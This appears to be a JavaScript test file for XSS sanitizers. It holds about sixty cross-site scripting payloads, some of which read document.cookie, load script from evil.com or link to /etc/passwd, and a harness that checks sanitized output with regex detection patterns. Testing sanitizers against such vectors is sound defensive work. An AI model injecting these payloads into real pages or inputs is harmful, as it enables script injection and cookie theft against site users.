const xssTestVectors = [
  // Basic Script Injection
  `<script>alert('XSS')</script>`,
  `<script>alert(String.fromCharCode(88,83,83))</script>`,
  `<script>alert(document.cookie)</script>`,
  
  // IMG Tag Attacks
  `<img src=x onerror=alert('XSS')>`,
  `<img src=x onerror=alert(String.fromCharCode(88,83,83))>`,
  `<img src=x onerror=alert(document.cookie)>`,
  `<img src="javascript:alert('XSS')">`,
  
  // SVG Attacks
  `<svg onload=alert('XSS')>`,
  `<svg/onload=alert('XSS')>`,
  `<svg><script>alert('XSS')</script></svg>`,
  
  // Event Handler Attacks
  `<body onload=alert('XSS')>`,
  `<div onclick="alert('XSS')">Click me</div>`,
  `<input type="text" onfocus="alert('XSS')" autofocus>`,
  `<select onfocus="alert('XSS')" autofocus><option>test</option></select>`,
  `<textarea onfocus="alert('XSS')" autofocus>test</textarea>`,
  `<button onclick="alert('XSS')">Click</button>`,
  
  // Link/Anchor Attacks
  `<a href="javascript:alert('XSS')">Click</a>`,
  `<a href="jAvAsCrIpT:alert('XSS')">Click</a>`,
  `<a href="  javascript:alert('XSS')">Click</a>`,
  `<a href="java\nscript:alert('XSS')">Click</a>`,
  
  // Style Attribute Attacks
  `<div style="background-image: url('javascript:alert(1)')">`,
  `<div style="expression(alert('XSS'))">`,
  `<style>body{background:url("javascript:alert('XSS')")}</style>`,
  
  // Meta Tag Attacks
  `<meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">`,
  `<meta http-equiv="refresh" content="0;url=data:text/html,<script>alert('XSS')</script>">`,
  
  // Form Attacks
  `<form action="javascript:alert('XSS')"><input type="submit"></form>`,
  `<form><button formaction="javascript:alert('XSS')">Submit</button></form>`,
  
  // Iframe Attacks
  `<iframe src="javascript:alert('XSS')"></iframe>`,
  `<iframe src="data:text/html,<script>alert('XSS')</script>"></iframe>`,
  
  // Object/Embed Attacks
  `<object data="javascript:alert('XSS')"></object>`,
  `<embed src="javascript:alert('XSS')">`,
  
  // Encoded Attacks
  `<img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;">`,
  `<img src=x onerror="&#x61;&#x6C;&#x65;&#x72;&#x74;('XSS')">`,
  `<a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;:alert('XSS')">Click</a>`,
  
  // Data URI Attacks
  `<a href="data:text/html,<script>alert('XSS')</script>">Click</a>`,
  `<script src="data:text/javascript,alert('XSS')"></script>`,
  
  // Base64 Encoded
  `<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">`,
  
  // Protocol Handlers
  `<a href="vbscript:msgbox('XSS')">Click</a>`,
  `<a href="file:///etc/passwd">Click</a>`,
  
  // Comments and CDATA
  `<!--[if IE]><script>alert('XSS')</script><![endif]-->`,
  `<![CDATA[<script>alert('XSS')</script>]]>`,
  
  // Malformed Tags
  `<script/src="http://evil.com/xss.js"></script>`,
  `<sc<script>ript>alert('XSS')</sc</script>ript>`,
  `<<script>alert('XSS');//<</script>`,
  
  // Case Variations
  `<ScRiPt>alert('XSS')</ScRiPt>`,
  `<IMG SRC=javascript:alert('XSS')>`,
  `<iMg SrC=x OnErRoR=alert('XSS')>`,
  
  // Null Bytes and Special Characters
  `<script>alert('XSS')</script>`,
  `<scr\x00ipt>alert('XSS')</scr\x00ipt>`,
  
  // Multiple Vectors in One
  `<div><script>alert('XSS1')</script><img src=x onerror=alert('XSS2')><a href="javascript:alert('XSS3')">Click</a></div>`,
  
  // CSS Expression (IE specific)
  `<div style="width: expression(alert('XSS'));">`,
  
  // HTML5 Specific
  `<video onerror="alert('XSS')"><source></video>`,
  `<audio onerror="alert('XSS')"><source></audio>`,
  `<details open ontoggle="alert('XSS')">`,
  
  // Mutation XSS
  `<noscript><p title="</noscript><img src=x onerror=alert('XSS')>">`,
  
  // DOM Clobbering
  `<form name="getElementById"><img src=x name="ownerDocument" onerror="alert('XSS')"></form>`,
];

// Function to test sanitization
function testSanitization(sanitizeFunction) {
  console.log('Testing XSS Prevention...\n');
  
  let passed = 0;
  let failed = 0;
  
  xssTestVectors.forEach((vector, index) => {
    const sanitized = sanitizeFunction(vector);
    
    // Check if common XSS indicators are present in sanitized output
    const hasScript = /<script/i.test(sanitized);
    const hasJavascript = /javascript:/i.test(sanitized);
    const hasOnEvent = /on\w+\s*=/i.test(sanitized);
    const hasVBScript = /vbscript:/i.test(sanitized);
    const hasData = /data:text\/html/i.test(sanitized);
    
    const isVulnerable = hasScript || hasJavascript || hasOnEvent || hasVBScript || hasData;
    
    if (isVulnerable) {
      console.log(`❌ FAILED Test ${index + 1}: Potential XSS vulnerability detected`);
      console.log(`   Input: ${vector.substring(0, 50)}...`);
      console.log(`   Output: ${sanitized.substring(0, 50)}...`);
      failed++;
    } else {
      console.log(`✅ PASSED Test ${index + 1}`);
      passed++;
    }
  });
  
  console.log(`\n========== TEST RESULTS ==========`);
  console.log(`Total Tests: ${xssTestVectors.length}`);
  console.log(`Passed: ${passed}`);
  console.log(`Failed: ${failed}`);
  console.log(`Success Rate: ${((passed/xssTestVectors.length) * 100).toFixed(2)}%`);
}

// Export for use
if (typeof module !== 'undefined' && module.exports) {
  module.exports = { xssTestVectors, testSanitization };
}